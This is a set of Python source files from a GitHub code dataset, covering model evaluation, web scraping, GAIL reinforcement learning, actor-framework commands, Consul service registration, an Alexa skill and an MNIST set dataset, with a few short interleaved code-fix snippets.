compared prediction - gt image pair\n :return: dict with following structure:\n {\"MODEL_NAME\":\n {\"SCORE_NAME\": score value (as float),\n }\n ...,\n }\n \"\"\"\n\n evaluator = Evaluator(metrics=metrics)\n scores = OrderedDict()\n\n for model_name, ckpt in models.items():\n # loading model\n model = nha.models.nha_optimizer.NHAOptimizer.load_from_checkpoint(ckpt).cuda()\n model.eval()\n\n # evaluation:\n scores[model_name] = OrderedDict()\n for batch in tqdm(\n iterable=dataloader, desc=f\"Quantitative Analysis of '{model_name}'\"\n ):\n batch = dict_2_device(batch, model.device)\n\n # get prediction\n pred_rgba = model.forward(batch)\n pred_rgb, pred_mask = pred_rgba[:, :3], pred_rgba[:, 3:]\n\n # get gt\n gt_rgb = batch[\"rgb\"]\n gt_mask = digitize_segmap(batch[\"seg\"]).float()\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # blur masks if specified:\n if blur_seg > 0:\n pred_mask = ttF.gaussian_blur(\n pred_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n gt_mask = ttF.gaussian_blur(\n gt_mask, 2 * int(2 * blur_seg) + 1, blur_seg\n )\n\n pred_rgb = fill_tensor_background(pred_rgb, pred_mask)\n gt_rgb = fill_tensor_background(gt_rgb, gt_mask)\n\n # evaluate image\n scores[model_name] = cat_torch_dicts(\n scores[model_name], evaluator(pred_rgb, gt_rgb)\n )\n\n # calculating average score for evaluation metrics\n for key, val in scores[model_name].items():\n scores[model_name][key] = val.mean().detach().cpu().item()\n\n return scores\n","repo_name":"philgras/neural-head-avatars","sub_path":"nha/evaluation/eval_suite.py","file_name":"eval_suite.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":462,"dataset":"github-code","pt":"32"}
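A minimal smoke test for the `Evaluator` above, restricted to the pixel metrics so no face detector or LPIPS weights are needed; the tensor shapes follow the docstring, and the data is random, illustrative only:

```python
import torch

# Dummy prediction/ground-truth pair shaped N x 3 x H x W in [-1, 1],
# as the Evaluator docstring above specifies.
pred = torch.rand(4, 3, 256, 256) * 2 - 1
gt = torch.rand(4, 3, 256, 256) * 2 - 1

evaluator = Evaluator(metrics=["L1", "L2"], device="cpu")
scores = evaluator(pred, gt, reduction="mean")
print({k: float(v) for k, v in scores.items()})
```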
+{"seq_id":"1475376827","text":"from openapi.utils import extend_schema_tags\n\ntag = 'extension'\npath = tag\nname = '插件配置'\n\nextend_schema_tags(\n tag,\n name,\n {\n 'type':'dashboard_page',\n 'init': {\n 'path': '/api/v1/marketplace/',\n 'method': 'get'\n },\n 'local': {\n 'install': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/',\n 'method': 'post',\n 'description': '点击安装'\n },\n 'update': {\n 'tag': 'extension.update',\n 'description': '编辑'\n },\n 'delete': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'delete',\n 'description': '删除'\n }\n }\n }\n)\n\nextension_update_tag = 'extension.update'\nextension_update_name = '编辑系统插件'\n\nextend_schema_tags(\n extension_update_tag,\n extension_update_name,\n {\n 'type': 'form_page',\n 'init': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'get'\n },\n 'global': {\n 'update': {\n 'path': '/api/v1/tenant/{parent_lookup_tenant}/extension/{id}/',\n 'method': 'put',\n 'description': '确定'\n }\n }\n }\n)","repo_name":"0079123/arkid","sub_path":"api/v1/pages/extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"1458225480","text":"#This program has been created to extract the prices from Big Basket\n#It currently can extract the prices only from the category list of products, eg. Friuts and Vegetables\n#Urls of the pages has to be proived in the excel-urls.csv present in the main project folder\n#DO NOT CHANGE THE NAME/EXTENSION OF urls.csv\n#This program generates an output file-prices-(date-time).csv, which extracts the product item, mrp and final price\n\nimport scrapy\nimport csv\nfrom itertools import zip_longest\nimport datetime\nimport re\nimport json\nfrom selenium import webdriver \nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nclass ProductPriceSpider(scrapy.Spider):\n\tname = \"bigbasket\"\n\n\tdef __init__(self):\n\t\tself.driver = webdriver.Chrome('/usr/bin/chromedriver')\n\t\t\t\t\t \n\tdef start_requests(self):\n\t\t#List of all urls to be searched. Commenting below code for testing \n\t\turls = []\n\n\t\t#reading input csv file\n\t\tfileName = \"urls.csv\"\n\t\twith open(fileName, 'r') as f:\n\t\t\tfor line in f.readlines():\n\t\t\t\turls.append(line)\n\n\t\tself.log(urls) \n\n\t\t#start extracting for all urls\n\t\tfor url in urls:\n\t\t\tself.log(url)\n\t\t\tyield scrapy.Request(url=url, callback=self.parse_link)\n\n\t#Parser specific for bigbasket htmls\n\t#Parser extracts item product name, quantity, MRP and final price\n\tdef parse_link(self, response):\t\t\t\n\t\tself.log(response.url)\n\t\tself.driver.get(response.url)\n\t\t\n\t\t#For list of subcategories of items wait for 15secs or until element is loaded\n\t\titems = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.tab-content div.item.prod-deck.row.ng-scope div.clearfix div.ng-scope\"))\n\t\t)\n\t\t\n\t\t#For individual product\n\t\titem = WebDriverWait(self.driver, 15).until(EC.presence_of_element_located((By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250\"))\n\t\t)\n\t\n\t\tif items:\n\t\t\tself.log(\"Inside items\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div/a')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in title_rows:\n\t\t\t\tproduct_titles.append(row.get_attribute('text'))\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\tmeasure_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[2]/div//span[1]/span[@ng-bind=\"vm.selectedProduct.w\"]')\n\t\t\t#Extract only the required value from the string\n\t\t\tfor row in measure_rows:\n\t\t\t\tproduct_measures.append(row.text)\n\t\t\tself.log(product_measures)\n\t\t\t\n\t\t\t#Product MRP rows\n\t\t\tproduct_mrps = []\n\t\t\tmrp_rows = self.driver.find_elements(By.XPATH, '//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div/h4/span[1]/span')\n\t\t\t#Extract only the MRP from the string\t\n\t\t\tfor row in mrp_rows:\n\t\t\t\tproduct_mrps.append(row.text)\n\t\t\tself.log(product_mrps)\n\n\t\t\t#Product final prize rows\n\t\t\tproduct_prices = []\n\t\t\toffer_rows = self.driver.find_elements(By.XPATH, 
'//*[@id=\"dynamicDirective\"]/product-deck/section/div[2]/div[4]/div[1]/div/div[1]/div[2]/div/div/product-template/div/div[4]/div[3]/div/div[1]/h4/span[2]/span')\n\t\t\t#Extract the final price from the string\t\n\t\t\tfor row in offer_rows:\n\t\t\t\tproduct_prices.append(row.text)\n\t\t\tself.log(product_prices)\n\n\t\telif item is not None:\n\t\t\tself.log(\"Inside item\")\n\t\t\t#Product title rows\n\t\t\tproduct_titles = []\n\t\t\ttitle = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct*\"]/div[2]/div[2]/h1').text\n\t\t\tproduct_titles.append(title)\n\t\t\tself.log(product_titles)\n\n\t\t\t#Product measurement rows\n\t\t\tproduct_measures = []\n\t\t\t#measure = self.driver.find_element(By.CSS_SELECTOR, \"div.uiv2-product-detail-content.wid-250 div.uiv2-product-size div.uiv2-size-variants label\").split(\"\")[1].split(\"\\n\")[0]\n\t\t\t#measure = sel.select(\"div.uiv2-product-detail-content.wid-250 div.uiv2-product-size div.uiv2-size-variants label\")[0].split(\"\")[1].split(\"\\n\")[0]\n\t\t\t#product_measures.append(measure)\n\t\t\t#self.log(product_measures)\n\n\t\t\t#Product MRP rows\n\t\t\tproduct_mrps = []\n\t\t\tmrp = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct*\"]/div[2]/div[3]/div[3]/div/span[2]').text\n\t\t\tproduct_mrps.append(mrp)\n\t\t\tself.log(product_mrps)\n\n\t\t\t#Product final prize rows\n\t\t\tproduct_prices = []\n\t\t\tprice = self.driver.find_element(By.XPATH, '//*[@id=\"slidingProduct\"]/div[2]/div[3]/div[4]').text\n\t\t\tproduct_prices.append(price)\n\t\t\tself.log(product_prices)\n\n\n\t\t#Write the extracted data into an output csv file\n\t\tfileName = 'prices-%s.csv' %datetime.datetime.now().strftime(\"%m-%d-%H-%M\")\n\t\twith open(fileName, 'a') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerows(zip(product_titles, product_measures, product_mrps, product_prices))\n\n\tdef tearDown(self):\t\t\n\t\tself.driver.close()\t\n","repo_name":"Sushma-Alse/bigbasketscrapy","sub_path":"extractor/spiders/bigbasket_spider.py","file_name":"bigbasket_spider.py","file_ext":"py","file_size_in_byte":5032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
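The spider above imports `zip_longest` but writes its CSV with plain `zip`, so if one selector misses an element, the shorter list silently truncates every other column. A small sketch of the safer write; the file name and sample values are made up:

```python
import csv
from itertools import zip_longest

titles = ["Rice 5kg", "Atta 1kg", "Salt"]
mrps = ["350", "60"]  # one element short, e.g. a missed selector

with open("prices.csv", "w", newline="") as f:
    writer = csv.writer(f)
    # zip() would drop the "Salt" row; zip_longest keeps it with a blank MRP.
    writer.writerows(zip_longest(titles, mrps, fillvalue=""))
```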
+{"seq_id":"19306942979","text":"import gym\nimport pybulletgym\nimport os\nimport sys\nimport pickle\nimport time\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nfrom utils import *\nfrom utils.get_reacher_vars import get_exp \nfrom utils.plot_rewards import *\nfrom arg_parser import prep_parser\nfrom models.mlp_policy import Policy\nfrom models.mlp_critic import Value\nfrom models.mlp_policy_disc import DiscretePolicy\nfrom models.mlp_discriminator import Discriminator\nfrom torch import nn\nfrom core.ppo import ppo_step\nfrom core.common import estimate_advantages\nfrom core.agent import Agent\n\n\ndef gail_reward(state, action, encode=[], policy=[], beta=None):\n \"\"\"\n Reward based on Discriminator net output as described in GAIL\n \"\"\"\n saep = tensor(np.hstack((state, action, encode, policy)), dtype=dtype)\n with torch.no_grad():\n return -math.log(discrim_net(saep)[0].item())\n\n\ndef sgail_reward(state, action, encode=[], policy=[], beta=None):\n \"\"\"\n Reward based on Discriminator and Generator net output as described in SGAIL\n \"\"\"\n # TODO: Fix\n saep = tensor(np.hstack((state, action, encode, policy)), dtype=dtype)\n #print(math.log(policy[0]+ 1e-10))\n with torch.no_grad():\n D = discrim_net(saep)[0].item()\n return -( math.log(D) - math.log(1 - D) \n + beta*math.log(policy[0]+ 1e-10)\n )\n # log(D) - log(1-D) + beta*log(pi) (Sure about pol.?)\n # Entropy regularization term\n\n\ndef update_params(batch):\n states = torch.from_numpy(np.stack(batch.state)).to(dtype).to(device)\n actions = torch.from_numpy(np.stack(batch.action)).to(dtype).to(device)\n rewards = torch.from_numpy(np.stack(batch.reward)).to(dtype).to(device)\n masks = torch.from_numpy(np.stack(batch.mask)).to(dtype).to(device)\n with torch.no_grad():\n values = value_net(states)\n fixed_log_probs = policy_net.get_log_prob(states, actions)\n\n \"\"\"get advantage estimation from the trajectories\"\"\"\n advantages, returns = estimate_advantages(rewards, masks, values, args.gamma, args.tau, device)\n\n \"\"\"update discriminator using optimizer\"\"\"\n for _ in range(1):\n expert_state_actions = torch.from_numpy(expert_traj).to(dtype).to(device)\n g_o = discrim_net(torch.cat([states, actions], 1))\n e_o = discrim_net(expert_state_actions)\n optimizer_discrim.zero_grad()\n discrim_loss = discrim_criterion(g_o, ones((states.shape[0], 1), device=device)) + \\\n discrim_criterion(e_o, zeros((expert_traj.shape[0], 1), device=device))\n discrim_loss.backward()\n optimizer_discrim.step()\n\n \"\"\"perform mini-batch PPO update on G and V\"\"\"\n optim_iter_num = int(math.ceil(states.shape[0] / optim_batch_size))\n for _ in range(optim_epochs):\n perm = np.arange(states.shape[0])\n np.random.shuffle(perm)\n perm = LongTensor(perm).to(device)\n\n states, actions, returns, advantages, fixed_log_probs = \\\n states[perm].clone(), actions[perm].clone(), returns[perm].clone(), advantages[perm].clone(), fixed_log_probs[perm].clone()\n\n for i in range(optim_iter_num):\n ind = slice(i * optim_batch_size, min((i + 1) * optim_batch_size, states.shape[0]))\n states_b, actions_b, advantages_b, returns_b, fixed_log_probs_b = \\\n states[ind], actions[ind], advantages[ind], returns[ind], fixed_log_probs[ind]\n\n ppo_step(policy_net, value_net, optimizer_policy, optimizer_value, 1, states_b, actions_b, returns_b,\n advantages_b, fixed_log_probs_b, args.clip_epsilon, args.l2_reg)\n\n\ndef main_loop():\n rew_expert, rew_system, rel_goals = [], [], []\n\n beta = args.beta\n delta_beta = 
-args.w\n for i_iter in range(args.max_iter_num):\n \"\"\"generate multiple trajectories that reach the minimum batch_size\"\"\"\n discrim_net.to(torch.device('cpu'))\n batch, log = agent.collect_samples(args.min_batch_size, beta)\n discrim_net.to(device)\n\n t0 = time.time()\n # Update params of V, G, D\n update_params(batch)\n # Modulate entropy correction param\n beta += delta_beta\n\n \"\"\"Printing and saving\"\"\"\n t1 = time.time()\n rew_expert.append(log['avg_c_reward'])\n rew_system.append(log['avg_reward'])\n rel_goals.append(log['reached_goals']/log['goals'])\n\n if i_iter % args.log_interval == 0:\n print(\"beta: \", beta)\n print('Num goals: {}\\tReached goals: {}'.format(log['goals'], log['reached_goals']))\n print('{}\\tT_sample {:.4f}\\tT_update {:.4f}\\texpert_R_avg {:.2f}\\tR_avg {:.2f}'.format(\n i_iter, log['sample_time'], t1 - t0, log['avg_c_reward'], log['avg_reward']))\n\n if args.save_model_interval > 0 and (i_iter + 1) % args.save_model_interval == 0:\n to_device(torch.device('cpu'), policy_net, value_net, discrim_net)\n pickle.dump((policy_net, value_net, discrim_net, running_state), \n open(os.path.join(assets_dir(), 'learned_models/{}_gail_{}_{}.p'.format(args.env_name, \"comp\" if lower_dim else \"full\", str(i_iter+1))), 'wb'))\n to_device(device, policy_net, value_net, discrim_net)\n\n \"\"\"clean up gpu memory\"\"\"\n torch.cuda.empty_cache()\n\n return rew_expert, rew_system, rel_goals\n\n\n### Starting main procedures\n\n# Prepare hyperparams\nargs = prep_parser()\n\n\"\"\"Prepare torch\"\"\"\ndtype = torch.float64\ntorch.set_default_dtype(dtype)\ndevice = torch.device('cuda', index=args.gpu_index) if torch.cuda.is_available() else torch.device('cpu')\nif torch.cuda.is_available():\n torch.cuda.set_device(args.gpu_index)\n\n\"\"\"environment\"\"\"\nenv = gym.make(args.env_name)\nlower_dim = args.lower_dim < env.observation_space.shape[0]\n\n\"\"\"seeding\"\"\"\nnp.random.seed(args.seed)\ntorch.manual_seed(args.seed)\nenv.seed(args.seed)\n\n\"\"\"Load expert trajs and encode labels+other important stuff for Reacher (state compression)\"\"\"\nstate_dim, action_dim, is_disc_action, expert_traj, running_state, encodes_d = get_exp(env, args)\n# 1200 1100 1500 1200 (5k)\n# 2400 1900 2250 3450 (10k)\n# 4500 4350 5150 6000 (20k)\n# 5850 5100 6700 7350 (25k)\n# 11250 11400 14600 12750 (50k)\n# 24450 24250 27300 24000 (100k)\nexpert_traj = expert_traj[:5850]\nencodes_d = encodes_d[:5850]\nrunning_state.fix = True\n\n\"\"\"define actor and critic\"\"\"\n# Policy = Generator\nif is_disc_action: # For gridworld\n policy_net = DiscretePolicy(state_dim, env.action_space.n)\nelse: # For pyBullet\n policy_net = Policy(state_dim, env.action_space.shape[0], log_std=args.log_std)\n\n# State value fun\nvalue_net = Value(state_dim)\n\n# Discriminator\ndiscrim_net = Discriminator(state_dim + action_dim)\ndiscrim_criterion = nn.BCELoss()\nto_device(device, policy_net, value_net, discrim_net, discrim_criterion)\n\n# Define optimizers\noptimizer_policy = torch.optim.Adam(policy_net.parameters(), lr=args.learning_rate)\noptimizer_value = torch.optim.Adam(value_net.parameters(), lr=args.learning_rate)\noptimizer_discrim = torch.optim.Adam(discrim_net.parameters(), lr=args.learning_rate)\n\n# optimization epoch number and batch size for PPO\noptim_epochs = 10 # 10\noptim_batch_size = 64 # 64\n\n\"\"\"create agent\"\"\"\nagent = Agent(env, policy_net, device, custom_reward=gail_reward, targets=True,\n running_state=running_state, render=args.render, num_threads=args.num_threads, 
lower_dim=lower_dim)\n\n# Finally do the learning\nre, rs, rg = main_loop()\n\n# Plot results\nplot_r(re, \"Expert\", args.env_name)\nplot_r(rs, \"Environment\", args.env_name)\nplot_reached(range(len(rg)), rg, args.env_name, \"comp\" if lower_dim else \"full\")","repo_name":"k4d3v/S-GAIL_ZK","sub_path":"gail/gail_gym.py","file_name":"gail_gym.py","file_ext":"py","file_size_in_byte":7613,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
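`gail_reward` above returns `-log(D)`, which diverges as the discriminator output approaches 0. A common guard, sketched here with an epsilon of my choosing, clamps the output before taking the log:

```python
import math

def safe_gail_reward(d_out, eps=1e-8):
    # Surrogate reward -log(D) with the discriminator output clamped
    # away from 0 and 1 for numerical stability.
    d_out = min(max(d_out, eps), 1.0 - eps)
    return -math.log(d_out)

print(safe_gail_reward(0.0))  # finite instead of raising ValueError
```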
+{"seq_id":"1508337487","text":"from time import time\n\nfrom ..utils.exceptions import CommandError\n\nfrom .proxy import command, ActorProxyMonitor\nfrom .futures import async_while\n\n\n@command()\ndef ping(request):\n return 'pong'\n\n\n@command()\ndef echo(request, message):\n '''Returns *message*'''\n return message\n\n\n@command()\ndef config(request, setget, name, *values):\n setget = setget.lower()\n if setget == 'get':\n if len(values) > 0:\n raise CommandError('\"config get\" accept only one parameter')\n return request.actor.cfg.get(name)\n elif setget == 'set':\n if len(values) > 1:\n raise CommandError('\"config get\" accept only two parameters')\n request.actor.cfg.set(name, values[0])\n return True\n else:\n raise CommandError('config must be followed by set or get')\n\n\n@command()\ndef run(request, callable, *args, **kwargs):\n '''Execute a python *callable*.'''\n return callable(request.actor, *args, **kwargs)\n\n\n@command(ack=False)\ndef stop(request):\n '''Stop the actor from running.'''\n return request.actor.stop()\n\n\n@command()\ndef notify(request, info):\n '''The actor notify itself with a dictionary of information.\n\n The command perform the following actions:\n\n * Update the mailbox to the current consumer of the actor connection\n * Update the info dictionary\n * Returns the time of the update\n '''\n t = time()\n actor = request.actor\n remote_actor = request.caller\n if isinstance(remote_actor, ActorProxyMonitor):\n remote_actor.mailbox = request.connection\n info['last_notified'] = t\n remote_actor.info = info\n callback = remote_actor.callback\n # if a callback is still available, this is the first\n # time we got notified\n if callback:\n remote_actor.callback = None\n callback.set_result(remote_actor)\n if actor.cfg.debug:\n actor.logger.debug('Got first notification from %s',\n remote_actor)\n elif actor.cfg.debug:\n actor.logger.debug('Got notification from %s', remote_actor)\n else:\n actor.logger.warning('notify got a bad actor')\n return t\n\n\n@command()\ndef spawn(request, **kwargs):\n '''Spawn a new actor.'''\n return request.actor.spawn(**kwargs)\n\n\n@command()\ndef info(request):\n ''' Returns information and statistics about the server as a json string'''\n return request.actor.info()\n\n\n@command()\nasync def kill_actor(request, aid, timeout=5):\n '''Kill an actor with id ``aid``.\n This command can only be executed by the arbiter,\n therefore a valid sintax is only::\n\n send('arbiter', 'kill_actor', 'abc')\n\n Return 'killed abc` if successful, otherwise it returns ``None``.\n '''\n arb = request.actor\n if arb.is_arbiter():\n await arb.send(aid, 'stop')\n proxy = await async_while(timeout, arb.get_actor, aid)\n if proxy:\n arb.logger.warning('Could not kill actor %s', aid)\n else:\n return 'killed %s' % aid\n","repo_name":"quantmind/pulsar","sub_path":"pulsar/async/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":3047,"program_lang":"python","lang":"en","doc_type":"code","stars":1875,"dataset":"github-code","pt":"32"}
+{"seq_id":"14605683875","text":"from .base import Register\n\nimport consul\nimport requests\nimport random\n\n\nclass Consul(Register):\n\n def __init__(self, host, port):\n self.host = host\n self.port = port\n self.c = consul.Consul(host=host, port=port)\n\n def register(self, name, id, address, port, tags, check):\n\n if check is None:\n check = {\n \"HTTP\": f\"http://{address}:{port}/health\",\n \"GRPCUseTLS\": False,\n \"Timeout\": \"5s\",\n \"Interval\": \"5s\",\n \"DeregisterCriticalServiceAfter\": \"5s\"\n }\n else:\n check = check\n return self.c.agent.service.register(\n name=name,\n service_id=id,\n address=address,\n port=port,\n tags=tags,\n check=check,\n )\n\n def deregister(self, service_id):\n return self.c.agent.service.deregister(service_id)\n\n def get_all_service(self):\n return self.c.agent.services()\n\n def filter_service(self, filter):\n url = f\"http://{self.host}:{self.port}/v1/agent/services\"\n params = {\n \"filter\": filter\n }\n print(requests.get(url).json().values())\n return requests.get(url, params=params).json()\n\n def get_host_port(self, filter):\n url = f\"http://{self.host}:{self.port}/v1/agent/services\"\n params = {\n \"filter\": filter\n }\n data = requests.get(url, params=params).json()\n if data:\n service_info = random.choice(list(data.values()))\n return service_info[\"Address\"], service_info[\"Port\"]\n return None, None\n\n def get_service(self, name):\n service1 = self.c.agent.services()\n service = self.c.agent.services().get(name)\n if not service:\n return None, None\n return service['Address'], service['Port']\n","repo_name":"ShenJianPing0307/python_micro_with_greeter","sub_path":"greeter_web/utils/consul/consul.py","file_name":"consul.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"15318162655","text":"import json\nimport os\nimport logging\nfrom flask import Flask, render_template\nfrom flask_ask import Ask, statement, question\nfrom flask_ask.verifier import VerificationError\nfrom dotenv import load_dotenv, find_dotenv\nfrom yelp import Yelp\nfrom flask_dotenv import DotEnv\n\nload_dotenv(find_dotenv())\napp = Flask(__name__)\nask = Ask(app, '/')\nenv = DotEnv()\nenv.init_app(app)\n\nlogging.getLogger(__name__).setLevel(logging.DEBUG)\napp_name = 'Eat Me'\n\n@ask.launch\ndef launch():\n welcome_text = render_template('welcome')\n welcome_repeat_text = render_template('welcome_repeat')\n\n return question(welcome_text).reprompt(welcome_repeat_text).simple_card(\n app_name, welcome_text)\n\n\n@ask.intent('AMAZON.HelpIntent')\ndef help():\n help_text = render_template('help')\n welcome_repeat_text = render_template('welcome_repeat')\n\n return question(help_text).reprompt(welcome_repeat_text).simple_card(\n app_name, help_text)\n\n\n@ask.intent('AMAZON.StopIntent')\n@ask.intent('AMAZON.CancelIntent')\ndef stop():\n bye_text = render_template('bye')\n\n return statement(bye_text)\n\n\n@ask.intent('EatMeIntent')\ndef yelp():\n yelp = Yelp(\n app_id=os.environ.get(\"YELP_APP_ID\"),\n app_secret=os.environ.get(\"YELP_APP_SECRET\"),\n app_access_token=os.environ.get(\"YELP_ACCESS_TOKEN\")\n )\n\n biz = yelp.run(term='restaurant', location='92683')\n miles = int(biz['distance'] / 1609.344)\n # print(biz)\n statement_text = render_template(\n 'answer',\n name=biz['name'],\n stars=biz['rating'],\n reviews=biz['review_count'],\n miles=miles,\n address=', '.join(biz['location']['display_address'])\n )\n statement_text = statement_text.replace('&', 'and')\n next_statement = render_template('answer_repeat')\n print(statement_text)\n\n return question(statement_text).reprompt(next_statement).simple_card(app_name, statement_text)\n\n\n@app.route('/')\ndef healthcheck():\n return 'ok'\n\n\n@ask.session_ended\ndef session_ended():\n return statement('')\n\n\n@app.errorhandler(VerificationError)\ndef failed_verification(error):\n print(error)\n return str(error), 400\n\n\n@app.errorhandler(Exception)\ndef global_exception(error):\n print(error)\n return statement('')\n\n\ndef main():\n app.run()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"kpx-dev/EatMe-Alexa-Food-Skill","sub_path":"eatme/eatme_flask.py","file_name":"eatme_flask.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
+{"seq_id":"9414419656","text":"import os\nimport time\nfrom config import Config\nfrom controller.webscraping import WebScrapingController\nfrom models.country import Country\nfrom operators.utils import Utils\n\nlogger = Config.LOGGER.value\n\n\nclass CountryOperator:\n def __init__(self, web_scraping_operator: WebScrapingController, filename: str):\n self.web_scraping_operator = web_scraping_operator\n self.current_path = Config.CURRENT_PATH.value\n self.filename = filename\n self.url = web_scraping_operator.url\n\n def ProcessScraping(self) -> bool:\n soup = self.web_scraping_operator.GetPageResponse()\n results = self.web_scraping_operator.getHTMLValuesByTag(\n soup=soup, tag_name=\"section\", tag_attribute=\"id\", tag_value=\"countries\"\n )\n\n countries = results.find_all(\"div\", class_=\"col-md-4 country\")\n\n countries_objects = []\n for country in countries:\n name = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"h3\",\n tag_attribute=\"class\",\n tag_value=\"country-name\",\n )\n capital = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"span\",\n tag_attribute=\"class\",\n tag_value=\"country-capital\",\n )\n population = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"span\",\n tag_attribute=\"class\",\n tag_value=\"country-population\",\n )\n area = self.web_scraping_operator.getHTMLValuesByTag(\n soup=country,\n tag_name=\"span\",\n tag_attribute=\"class\",\n tag_value=\"country-area\",\n )\n\n countries_objects.append(\n Country(\n name=name.text.strip(),\n capital=capital.text.strip(),\n population=population.text.strip(),\n area=area.text.strip(),\n ).to_dict()\n )\n\n Utils.listToCsv(countries_objects, self.current_path, self.filename)\n\n if os.path.isfile(f\"{self.current_path}/{self.filename}\"):\n logger.info(f\"File {self.filename} created/updated!\")\n return True\n else:\n return False\n\n def ProcessWithRetry(self):\n for attempt in range(Config.ATTEMPTS.value):\n log_attempt = f\"[attempt: {attempt}]\"\n logger.info(\n f\"{log_attempt} - Starting scraping on site [{self.url}] and creating csv\"\n )\n\n try:\n processed = self.ProcessScraping()\n if processed:\n logger.info(\n f\"{log_attempt} - Finishing scraping on site [{self.url}] and creating csv\"\n )\n except Exception as e:\n logger.error(f\"{log_attempt} - {e} - Scraping Error\")\n time.sleep(Config.RETRY_TIME.value)\n continue\n else:\n break\n","repo_name":"edipo-moreira/web_scraping","sub_path":"operators/country.py","file_name":"country.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"35140729516","text":"import os\nimport numpy as np\nfrom torch.utils.data import Dataset\nfrom torchvision.datasets import MNIST\nimport torchvision.transforms as transforms\n\n_ROWS28x28, _COLS28x28 = np.where(np.ones((28,28)))\n\ndef _to01(x):\n m = x.min()\n M = x.max()\n return (x-m)/(M-m)\n\ndef _pixels_choise(img, npixels):\n\n p = img.flatten() / img.sum()\n inds = np.where(p)[0]\n p = p[inds]\n\n choise = np.array(np.random.choice(inds, size=npixels, p=p))\n\n rows = _ROWS28x28[choise]\n cols = _COLS28x28[choise]\n\n return np.array(zip(rows,cols))\n\n\ndef _img2set(img, set_size_range=[300,500]):\n set_size = set_size_range[0] if set_size_range[0] == set_size_range[1] \\\n else np.random.randint(set_size_range[0], set_size_range[1])\n\n s = _pixels_choise(img.squeeze(), set_size)\n padded = np.zeros((set_size_range[1], 2),dtype=np.float32)\n padded[:s.shape[0],:] = s\n\n return padded\n\n\n\n\n\n\nclass MnistSetsDataset(Dataset):\n def __init__(self, train, set_size_range=[300,500]):\n trans = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,), (1.0,)),\n transforms.Lambda(lambda x: _to01(x)),\n transforms.Lambda(lambda x: np.array(x)),\n transforms.Lambda(lambda x: _img2set(x, set_size_range)),\n ])\n # if not exist, download mnist dataset\n #train_set = MNIST(root=root, train=True, transform=trans, download=True)\n root = './data'\n if not os.path.exists(root):\n os.mkdir(root)\n mnist_dataset = MNIST(root=root, train=train, transform=trans, download=True)\n\n self._dataset = [(data, target) for data, target in mnist_dataset]\n\n\n def __getitem__(self, item):\n return self._dataset[item]\n\n def __len__(self):\n return len(self._dataset)\n\nif __name__ == '__main__':\n import pylab as plt\n dataset = MnistSetsDataset(train=True, set_size_range=[10,100])\n\n for i in range(10):\n data=dataset[i][0]\n im = np.zeros([28,28])\n for row,col in data:\n im[int(row),int(col)] += 1\n\n plt.imshow(im)\n plt.show()\n\n\n","repo_name":"shohamne/set-augmentation","sub_path":"datasets/mnist_sets.py","file_name":"mnist_sets.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
